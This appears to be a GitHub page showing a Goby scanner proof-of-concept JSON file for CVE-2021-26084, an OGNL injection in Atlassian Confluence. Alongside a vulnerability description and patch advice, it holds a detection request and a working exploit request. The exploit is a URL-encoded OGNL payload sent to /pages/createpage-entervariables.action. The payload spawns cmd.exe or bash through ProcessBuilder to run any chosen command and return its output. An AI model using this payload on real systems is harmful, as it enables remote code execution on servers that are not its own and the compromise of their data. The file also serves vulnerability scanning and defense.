forked from luck-ying/Library-POC
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json
106 lines (106 loc) · 5.8 KB
/
Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
{
"Name": "Atlassian Confluence OGNL injection CVE-2021-26084",
"Level": "3",
"Tags": [
"rce"
],
"GobyQuery": "app=\"Confluence\"",
"Description": "Confluence is Atlassian's professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis. Therefore, Confluence is widely used. In some cases, unauthorized attackers can construct special requests that cause remote code execution.",
"Product": "Atlassian Confluence",
"Homepage": "https://www.atlassian.com",
"Author": "[email protected]",
"Impact": "<p>An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.<br></p>",
"Recommendation": "<p>General repair suggestions:</p><p>Check and upgrade to the secure version based on the information in the affected version. The official download link is :<a href>https://www.atlassian.com/software/confluence/download-archives</a></p><p>Temporary repair suggestions:</p><p>If you are not ready to update the Confluence, please refer to the official notification calling for Mitigation for Linux and Windows operating systems.:<a href>https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html</a></p>",
"References": [
"https://github.com/alt3kx/CVE-2021-26084_PoC"
],
"HasExp": true,
"ExpParams": [
{
"Name": "command",
"Type": "input",
"Value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/pages/createpage-entervariables.action?SpaceKey=x",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaaaaaa%5Cu0027%2B%7B{{{r1}}}%2B{{{r2}}}%7D%2B%5Cu0027",
"set_variable": [
"r1|rand|int|8",
"r2|rand|int|7",
"r4|r1|add|r2"
]
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "{{{r4}}}",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/pages/createpage-entervariables.action?SpaceKey=x",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaaaaaa%5Cu0027%2B%7BClass.forName%28%5Cu0027javax.script.ScriptEngineManager%5Cu0027%29.newInstance%28%29.getEngineByName%28%5Cu0027JavaScript%5Cu0027%29.%5Cu0065val%28%5Cu0027var+isWin+%3D+java.lang.System.getProperty%28%5Cu0022os.name%5Cu0022%29.toLowerCase%28%29.contains%28%5Cu0022win%5Cu0022%29%3B+var+cmd+%3D+new+java.lang.String%28%5Cu0022{{{command}}}%5Cu0022%29%3Bvar+p+%3D+new+java.lang.ProcessBuilder%28%29%3B+if%28isWin%29%7Bp.command%28%5Cu0022cmd.exe%5Cu0022%2C+%5Cu0022%2Fc%5Cu0022%2C+cmd%29%3B+%7D+else%7Bp.command%28%5Cu0022bash%5Cu0022%2C+%5Cu0022-c%5Cu0022%2C+cmd%29%3B+%7Dp.redirectErrorStream%28true%29%3B+var+process%3D+p.start%28%29%3B+var+inputStreamReader+%3D+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3B+var+bufferedReader+%3D+new+java.io.BufferedReader%28inputStreamReader%29%3B+var+line+%3D+%5Cu0022%5Cu0022%3B+var+output+%3D+%5Cu0022%5Cu0022%3B+while%28%28line+%3D+bufferedReader.readLine%28%29%29+%21%3D+null%29%7Boutput+%3D+output+%2B+line+%2B+java.lang.Character.toString%2810%29%3B+%7D%5Cu0027%29%7D%2B%5Cu0027bbbbbbbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|(?s)aaaaaaaa\\[(.*?)\\]bbbbbbb"
]
}
],
"PostTime": "2021-09-03 11:27:04",
"GobyVersion": "1.8.300"
}